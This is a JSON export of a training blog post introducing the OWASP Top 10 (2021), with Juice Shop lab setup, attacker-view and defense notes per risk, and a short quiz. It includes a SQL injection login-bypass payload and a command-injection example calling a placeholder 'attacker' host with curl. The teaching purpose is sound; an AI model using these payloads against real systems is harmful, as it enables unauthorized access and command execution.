{"id":53842,"date":"2025-10-11T00:50:11","date_gmt":"2025-10-11T00:50:11","guid":{"rendered":"https:\/\/www.devopsschool.com\/blog\/?p=53842"},"modified":"2025-10-11T00:58:44","modified_gmt":"2025-10-11T00:58:44","slug":"owasp-introduction-to-owasp-top-10-security-risks","status":"publish","type":"post","link":"https:\/\/www.devopsschool.com\/blog\/owasp-introduction-to-owasp-top-10-security-risks\/","title":{"rendered":"OWASP: Introduction to OWASP Top 10 Security Risks"},"content":{"rendered":"\n
Resource<\/th>Title<\/th><\/tr><\/thead>
OWASP Injection<\/a><\/td>OWASP Injection<\/td><\/tr>
OWASP Broken Authentication<\/a><\/td>OWASP Broken Authentication<\/td><\/tr>
OWASP Sensitive Data Exposure<\/a><\/td>OWASP Sensitive Data Exposure<\/td><\/tr>
OWASP XML External Entities<\/a><\/td>OWASP XML External Entities<\/td><\/tr>
OWASP Broken Access Control<\/a><\/td>OWASP Broken Access Control<\/td><\/tr>
OWASP Security Misconfiguration<\/a><\/td>OWASP Security Misconfiguration<\/td><\/tr>
OWASP Cross-Site Scripting (XSS)<\/a><\/td>OWASP Cross-Site Scripting (XSS)<\/td><\/tr>
OWASP Insecure Deserialization<\/a><\/td>OWASP Insecure Deserialization<\/td><\/tr>
OWASP Using Components with Known Vulnerabilities<\/a><\/td>OWASP Using Components with Known Vulnerabilities<\/td><\/tr>
National Vulnerability Database<\/a><\/td>National Vulnerability Database<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

<\/p>\n\n\n\n

\n\n\n\n

Introduction to the OWASP Top 10 (2021)<\/h1>\n\n\n\n


Prereqs:<\/strong> Basic web app knowledge (HTTP, HTML\/JS), command line familiarity
Goal:<\/strong> Understand the OWASP Top 10 2021 risks from attacker and defender perspectives, and practice the most common exploits safely in OWASP Juice Shop.<\/p>\n\n\n\n

\n\n\n\n

Learning Outcomes<\/h2>\n\n\n\n

By the end, you\u2019ll be able to:<\/p>\n\n\n\n

    \n
  • Explain what OWASP is and why the Top 10 matters.<\/li>\n\n\n\n
  • Install and run OWASP Juice Shop in a safe lab.<\/li>\n\n\n\n
  • Describe each 2021 Top 10 category, how attackers exploit it, and how to mitigate it.<\/li>\n\n\n\n
  • Perform and defend against common Injection<\/strong> and XSS<\/strong> attacks.<\/li>\n\n\n\n
  • Build practical controls: least privilege, logging & monitoring, CSP, patch management, and secure defaults.<\/li>\n<\/ul>\n\n\n\n
    \n\n\n\n

    Module 1 \u2014 Meet OWASP<\/h1>\n\n\n\n

    What is OWASP?<\/strong>
    The Open Web Application Security Project<\/strong> is a nonprofit community improving software security through projects like:<\/p>\n\n\n\n

      \n
    • OWASP Top 10<\/strong> (this course)<\/li>\n\n\n\n
    • OWASP Juice Shop<\/strong> (intentionally vulnerable app for practice)<\/li>\n\n\n\n
    • ModSecurity Core Rule Set (CRS)<\/strong> (WAF rules)<\/li>\n\n\n\n
    • OWASP API Security Top 10<\/strong><\/li>\n<\/ul>\n\n\n\n

      Why the Top 10?<\/strong>
      It\u2019s a consensus view of the most critical web app risks. Use it for threat modeling, secure coding standards, training, and security testing scope.<\/p>\n\n\n\n

      \n\n\n\n

      Module 2 \u2014 Lab Setup: OWASP Juice Shop (Docker on Kali\/Ubuntu)<\/h1>\n\n\n\n
      \n

      Time:<\/strong> 10\u201315 minutes<\/p>\n<\/blockquote>\n\n\n\n

      Step 1: Install Docker<\/strong><\/p>\n\n\n

      sudo<\/span> apt<\/span> update<\/span>\nsudo<\/span> apt<\/span> install<\/span> -y<\/span> docker<\/span>.io<\/span>\nsudo<\/span> systemctl<\/span> enable<\/span> --now<\/span> docker<\/span>\n<\/code><\/span>Code language:<\/span> CSS<\/span> (<\/span>css<\/span>)<\/span><\/small><\/pre>\n\n\n
      Step 2: Run Juice Shop<\/strong><\/p>\n\n\n
      sudo docker pull bkimminich\/juice-shop\nsudo docker run -d -p 8080:3000 --name juice bkimminich\/juice-shop\n<\/code><\/span><\/pre>\n\n\n
      Step 3: Access the app<\/strong><\/p>\n\n\n\n
        \n
      • Browse to http:\/\/<your-public-ip>:8080<\/code> (or http:\/\/localhost:8080<\/code> if local)<\/li>\n\n\n\n
      • You\u2019re ready to practice! (Never expose this to the public internet.)<\/li>\n<\/ul>\n\n\n\n
        \n
        Tip:<\/strong> If docker run<\/code> fails for permissions, prepend sudo<\/code>.<\/p>\n<\/blockquote>\n\n\n\n
        \n\n\n\n
        Module 3 \u2014 2017 \u2192 2021 Changes (Quick Map)<\/h1>\n\n\n\n
          \n
        • Broken Access Control<\/strong> rose to #1<\/strong>.<\/li>\n\n\n\n
        • Sensitive Data Exposure<\/strong> recategorized as Cryptographic Failures<\/strong>.<\/li>\n\n\n\n
        • Broken Authentication<\/strong> \u2192 Identification & Authentication Failures<\/strong>.<\/li>\n\n\n\n
        • XXE<\/strong> folded into Security Misconfiguration<\/strong>.<\/li>\n\n\n\n
        • XSS<\/strong> folded into Injection<\/strong>.<\/li>\n\n\n\n
        • Insecure Deserialization<\/strong> \u2192 Software & Data Integrity Failures<\/strong>.<\/li>\n\n\n\n
        • Using Components with Known Vulnerabilities<\/strong> \u2192 Vulnerable & Outdated Components<\/strong>.<\/li>\n\n\n\n
        • New on list: Server-Side Request Forgery (SSRF)<\/strong>.<\/li>\n<\/ul>\n\n\n\n
          Use this when updating legacy checklists and training.<\/p>\n\n\n\n
          \n\n\n\n
          Module 4 \u2014 The OWASP Top 10 (2021), Explained<\/h1>\n\n\n\n
          For each risk: Attacker View \u2192 What Can Go Wrong \u2192 Defenses<\/strong><\/p>\n\n\n\n
          \n\n\n\n
          1) Broken Access Control<\/h2>\n\n\n\n
          Attacker view:<\/strong> Force-browsing to privileged URLs (\/admin<\/code>), IDOR (changing ?userId=123<\/code> to 124<\/code>), abusing missing server-side checks.<\/p>\n\n\n\n
          What goes wrong:<\/strong> Users read\/modify other users\u2019 data, escalate privileges.<\/p>\n\n\n\n
          Defenses<\/strong><\/p>\n\n\n\n
            \n
          • Enforce server-side<\/strong> authorization checks on every request.<\/li>\n\n\n\n
          • Least privilege<\/strong> roles & permissions; deny by default.<\/li>\n\n\n\n
          • Use framework authz annotations\/policies; test IDOR explicitly.<\/li>\n\n\n\n
          • Invalidate JWTs on logout; don\u2019t trust client-side claims alone.<\/li>\n\n\n\n
          • Log & alert on access denials and unusual patterns.<\/li>\n<\/ul>\n\n\n\n
            \n\n\n\n
            2) Cryptographic Failures<\/h2>\n\n\n\n
            Attacker view:<\/strong> Sniff data in transit, harvest plaintext secrets at rest, exploit weak ciphers\/outdated TLS.<\/p>\n\n\n\n
            Defenses<\/strong><\/p>\n\n\n\n
              \n
            • TLS everywhere<\/strong>; enable HSTS<\/strong> header.<\/li>\n\n\n\n
            • Strong algorithms & key sizes; rotate keys.<\/li>\n\n\n\n
            • Never log secrets; use KMS\/secret managers.<\/li>\n\n\n\n
            • Don\u2019t decrypt\u2192re-encrypt across untrusted hops; keep data encrypted end-to-end where feasible.<\/li>\n\n\n\n
            • Classify data; encrypt sensitive data at rest and in transit.<\/li>\n<\/ul>\n\n\n\n
              \n\n\n\n
              3) Injection (SQL\/NoSQL\/OS\/LDAP + XSS included)<\/h2>\n\n\n\n
              Attacker view:<\/strong> Craft input that alters interpreter behavior:<\/p>\n\n\n\n
                \n
              • SQL: ' OR 1=1--<\/code><\/li>\n\n\n\n
              • OS: ; curl http:\/\/attacker\/\u2026<\/code><\/li>\n\n\n\n
              • LDAP\/NoSQL: unescaped filters<\/li>\n\n\n\n
              • XSS (now under Injection): run arbitrary JS in the victim browser.<\/li>\n<\/ul>\n\n\n\n
                Defenses<\/strong><\/p>\n\n\n\n
                  \n
                • Parameterized queries<\/strong> \/ prepared statements.<\/li>\n\n\n\n
                • Input validation<\/strong> (allow-list) + output encoding<\/strong>.<\/li>\n\n\n\n
                • For XSS: CSP<\/strong> (no inline scripts), escape context-specifically (HTML\/JS\/URL).<\/li>\n\n\n\n
                • Run app with least OS\/database privileges.<\/li>\n<\/ul>\n\n\n\n
                  \n\n\n\n
                  4) Insecure Design<\/h2>\n\n\n\n
                  Attacker view:<\/strong> Exploit flawed business logic (e.g., coupon misuse, weak workflow checks).<\/p>\n\n\n\n
                  Defenses<\/strong><\/p>\n\n\n\n
                    \n
                  • Threat model early (STRIDE, abuse cases).<\/li>\n\n\n\n
                  • Security requirements & secure design patterns<\/strong> (reference architectures).<\/li>\n\n\n\n
                  • Break glass reviews for high-risk flows (auth, payments, exports).<\/li>\n<\/ul>\n\n\n\n
                    \n\n\n\n
                    5) Security Misconfiguration<\/h2>\n\n\n\n
                    Attacker view:<\/strong> Default creds, verbose errors, open S3 buckets, debug enabled in prod.<\/p>\n\n\n\n
                    Defenses<\/strong><\/p>\n\n\n\n
                      \n
                    • Hardened baselines; disable defaults<\/strong> and services you don\u2019t use.<\/li>\n\n\n\n
                    • Infrastructure as Code<\/strong> with peer-reviewed templates.<\/li>\n\n\n\n
                    • Centralized config secrets; environment-specific safe defaults.<\/li>\n\n\n\n
                    • Patch and scan for drift; secure HTTP headers.<\/li>\n<\/ul>\n\n\n\n
                      \n\n\n\n
                      6) Vulnerable & Outdated Components<\/h2>\n\n\n\n
                      Attacker view:<\/strong> Race to exploit NVD\/CVE disclosures and Shodan-exposed targets.<\/p>\n\n\n\n
                      Defenses<\/strong><\/p>\n\n\n\n
                        \n
                      • SBOM<\/strong> + dependency inventory.<\/li>\n\n\n\n
                      • Automated dependency updates (Dependabot\/Renovate).<\/li>\n\n\n\n
                      • Risk-based patch SLAs; block builds on critical CVEs.<\/li>\n<\/ul>\n\n\n\n
                        \n\n\n\n
                        7) Identification & Authentication Failures<\/h2>\n\n\n\n
                        Attacker view:<\/strong> Credential stuffing, weak passwords, long-lived sessions.<\/p>\n\n\n\n
                        Defenses<\/strong><\/p>\n\n\n\n
                          \n
                        • MFA<\/strong> for all sensitive actions.<\/li>\n\n\n\n
                        • Strong password policy + breach checks.<\/li>\n\n\n\n
                        • Session timeouts, SameSite\/HttpOnly\/Secure<\/code> cookies; don\u2019t expose session IDs in URLs.<\/li>\n\n\n\n
                        • Rate limiting login; lockout\/cooldowns.<\/li>\n<\/ul>\n\n\n\n
                          \n\n\n\n
                          8) Software & Data Integrity Failures<\/h2>\n\n\n\n
                          Attacker view:<\/strong> Supply chain exploits (malicious updates, tampered packages).<\/p>\n\n\n\n
                          Defenses<\/strong><\/p>\n\n\n\n
                            \n
                          • Signed artifacts<\/strong> (Sigstore\/Cosign); verify on deploy.<\/li>\n\n\n\n
                          • Pin dependencies; restrict build permissions.<\/li>\n\n\n\n
                          • Immutable, reproducible builds.<\/li>\n<\/ul>\n\n\n\n
                            \n\n\n\n
                            9) Security Logging & Monitoring Failures<\/h2>\n\n\n\n
                            Attacker view:<\/strong> Operate without detection; persistence and lateral movement.<\/p>\n\n\n\n
                            Defenses<\/strong><\/p>\n\n\n\n
                              \n
                            • Log auth<\/strong>, privileged actions<\/strong>, data access<\/strong>, and errors<\/strong> with timestamps and request IDs.<\/li>\n\n\n\n
                            • Centralize to a SIEM<\/strong>; alert on brute-force, access denials, anomaly spikes.<\/li>\n\n\n\n
                            • Incident response runbooks and regular drills.<\/li>\n<\/ul>\n\n\n\n
                              \n\n\n\n
                              10) Server-Side Request Forgery (SSRF)<\/h2>\n\n\n\n
                              Attacker view:<\/strong> Coerce server to fetch internal URLs (IMDS, admin consoles).<\/p>\n\n\n\n
                              Defenses<\/strong><\/p>\n\n\n\n
                                \n
                              • Deny egress to internal networks; URL allow-lists.<\/li>\n\n\n\n
                              • Validate\/normalize URLs server-side; disable redirects.<\/li>\n\n\n\n
                              • Use IMDSv2 \/ metadata service hardening in cloud.<\/li>\n<\/ul>\n\n\n\n
                                \n\n\n\n
                                Module 5 \u2014 Hands-On Labs (Juice Shop)<\/h1>\n\n\n\n
                                \n
                                Always attack only your lab environment.<\/strong><\/p>\n<\/blockquote>\n\n\n\n
                                Lab A: SQL Injection (Login Bypass)<\/h3>\n\n\n\n
                                  \n
                                1. Open Juice Shop \u2192 Login.<\/li>\n\n\n\n
                                2. In Email<\/strong>: '+OR 1=1--<\/code>
                                  Password: anything.<\/li>\n\n\n\n
                                3. Observe admin login (or enumerated user).<\/li>\n<\/ol>\n\n\n\n
                                  Why it works:<\/strong> The injected predicate forces the WHERE clause true; --<\/code> comments out the remainder.<\/p>\n\n\n\n
                                  Fix it (conceptually):<\/strong><\/p>\n\n\n\n
                                    \n
                                  • Use parameterized queries.<\/li>\n\n\n\n
                                  • Sanitize input and enforce types\/length.<\/li>\n\n\n\n
                                  • Minimize DB privileges (no writes for read-only flows).<\/li>\n<\/ul>\n\n\n\n
                                    \n\n\n\n
                                    Lab B: XSS (Reflected\/DOM)<\/h3>\n\n\n\n
                                      \n
                                    1. Use the search field.<\/li>\n\n\n\n
                                    2. Try a harmless payload that proves script execution (e.g., DOM-based XSS using an injected element).<\/li>\n<\/ol>\n\n\n\n
                                      Defenses to discuss:<\/strong><\/p>\n\n\n\n
                                        \n
                                      • Encode output per context.<\/li>\n\n\n\n
                                      • CSP with no inline scripts; script-nonce.<\/li>\n\n\n\n
                                      • Validate and reject unexpected characters for specific fields.<\/li>\n<\/ul>\n\n\n\n
                                        \n\n\n\n
                                        Module 6 \u2014 Secure Defaults in Cloud (Mini Demo Plan)<\/h1>\n\n\n\n
                                        Example: S3 bucket hardening checklist<\/strong><\/p>\n\n\n\n
                                          \n
                                        • Block public access (account & bucket level).<\/li>\n\n\n\n
                                        • Default encryption (SSE-S3 or SSE-KMS).<\/li>\n\n\n\n
                                        • Least-privilege bucket policies and IAM roles.<\/li>\n\n\n\n
                                        • Versioning & access logging enabled.<\/li>\n<\/ul>\n\n\n\n
                                          (Adapt similar hardening for web servers, DBs, object stores.)<\/p>\n\n\n\n
                                          \n\n\n\n
                                          Module 7 \u2014 Quick Checks (Assessments)<\/h1>\n\n\n\n
                                          5 questions<\/strong><\/p>\n\n\n\n
                                            \n
                                          1. Which control best prevents IDOR?
                                            a) CSP b) Server-side authorization per object c) Captcha
                                            Ans:<\/strong> b<\/li>\n\n\n\n
                                          2. Storing SSNs in plaintext violates which category most directly?
                                            Ans:<\/strong> Cryptographic Failures<\/li>\n\n\n\n
                                          3. The most reliable fix for SQL injection is:
                                            Ans:<\/strong> Parameterized queries<\/li>\n\n\n\n
                                          4. Which header helps reduce XSS impact?
                                            Ans:<\/strong> Content-Security-Policy (CSP)<\/li>\n\n\n\n
                                          5. Which is a hallmark of SSRF?
                                            Ans:<\/strong> Server makes requests to internal resources on attacker\u2019s behalf<\/li>\n<\/ol>\n\n\n\n
                                            \n\n\n\n
                                            Module 8 \u2014 Operationalizing the Top 10<\/h1>\n\n\n\n
                                            Team Playbook<\/strong><\/p>\n\n\n\n
                                              \n
                                            • Build time:<\/strong> lint\/scan deps; block high CVEs; unit tests for authz and validation.<\/li>\n\n\n\n
                                            • Pre-prod:<\/strong> DAST on key flows; threat model delta changes.<\/li>\n\n\n\n
                                            • Prod:<\/strong> SIEM alerts, WAF with CRS, rate limits, auth anomalies.<\/li>\n\n\n\n
                                            • Governance:<\/strong> Update secure coding standards to 2021 categories; training + labs quarterly.<\/li>\n<\/ul>\n\n\n\n
                                              Headers Starter Pack (examples)<\/strong><\/p>\n\n\n
                                              Strict-Transport-Security<\/span>: max-age=31536000; includeSubDomains\nContent-Security-Policy<\/span>: default-src 'self'; object-src 'none'; base-uri 'self'\nX-Content-Type-Options<\/span>: nosniff\nReferrer-Policy<\/span>: no-referrer\nPermissions-Policy<\/span>: geolocation=(), camera=()\n<\/code><\/span>Code language:<\/span> HTTP<\/span> (<\/span>http<\/span>)<\/span><\/small><\/pre>\n\n\n
                                              \n\n\n\n
                                              Cheatsheets & Job Aids<\/h1>\n\n\n\n
                                              Injection Defense (DB)<\/strong><\/p>\n\n\n\n
                                                \n
                                              • Prepared statements only<\/li>\n\n\n\n
                                              • ORM escaping rules respected<\/li>\n\n\n\n
                                              • Input allow-lists, length limits<\/li>\n\n\n\n
                                              • Read-only DB roles for read paths<\/li>\n<\/ul>\n\n\n\n
                                                Auth & Session<\/strong><\/p>\n\n\n\n
                                                  \n
                                                • MFA + breached password checks<\/li>\n\n\n\n
                                                • Short session TTL; refresh tokens rotated<\/li>\n\n\n\n
                                                • Cookies: Secure; HttpOnly; SameSite=Strict<\/code><\/li>\n<\/ul>\n\n\n\n
                                                  Access Control<\/strong><\/p>\n\n\n\n
                                                    \n
                                                  • Enforce server-side, per-object checks<\/li>\n\n\n\n
                                                  • Deny-by-default routes<\/li>\n\n\n\n
                                                  • Role reviews every release<\/li>\n<\/ul>\n\n\n\n
                                                    Logging & IR<\/strong><\/p>\n\n\n\n
                                                      \n
                                                    • Centralize logs with request IDs<\/li>\n\n\n\n
                                                    • Alert on 401\/403 spikes, failed logins, admin actions<\/li>\n\n\n\n
                                                    • Incident runbooks and on-call<\/li>\n<\/ul>\n\n\n\n
                                                      \n\n\n\n
                                                      Conclusion & Next Steps<\/h1>\n\n\n\n
                                                        \n
                                                      • Keep practicing in OWASP Juice Shop<\/strong>\u2014repeat the labs and try new challenges.<\/li>\n\n\n\n
                                                      • Fold these controls into your pipelines: dependency updates, IaC hardening, authz tests, and headers.<\/li>\n\n\n\n
                                                      • Stay engaged with your local OWASP chapter and the broader community.<\/li>\n<\/ul>\n\n\n\n
                                                        Stretch Goals<\/strong><\/p>\n\n\n\n
                                                          \n
                                                        • Add WAF (ModSecurity CRS) in front of Juice Shop and observe blocked payloads.<\/li>\n\n\n\n
                                                        • Implement CSP nonces and measure what breaks\u2014then fix it the right way.<\/li>\n\n\n\n
                                                        • Generate an SBOM and track CVEs over time.<\/li>\n<\/ul>\n\n\n\n
                                                          \n\n\n\n
                                                          <\/p>\n","protected":false},"excerpt":{"rendered":"
                                                          Resource Title OWASP Injection OWASP Injection OWASP Broken Authentication OWASP Broken Authentication OWASP Sensitive Data Exposure OWASP Sensitive Data Exposure OWASP XML External Entities OWASP XML External Entities OWASP Broken… <\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"","sticky":false,"template":"","format":"standard","meta":{"_joinchat":[],"footnotes":""},"categories":[11138],"tags":[],"class_list":["post-53842","post","type-post","status-publish","format-standard","hentry","category-best-tools"],"_links":{"self":[{"href":"https:\/\/www.devopsschool.com\/blog\/wp-json\/wp\/v2\/posts\/53842","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.devopsschool.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.devopsschool.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.devopsschool.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.devopsschool.com\/blog\/wp-json\/wp\/v2\/comments?post=53842"}],"version-history":[{"count":3,"href":"https:\/\/www.devopsschool.com\/blog\/wp-json\/wp\/v2\/posts\/53842\/revisions"}],"predecessor-version":[{"id":53845,"href":"https:\/\/www.devopsschool.com\/blog\/wp-json\/wp\/v2\/posts\/53842\/revisions\/53845"}],"wp:attachment":[{"href":"https:\/\/www.devopsschool.com\/blog\/wp-json\/wp\/v2\/media?parent=53842"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.devopsschool.com\/blog\/wp-json\/wp\/v2\/categories?post=53842"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.devopsschool.com\/blog\/wp-json\/wp\/v2\/tags?post=53842"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}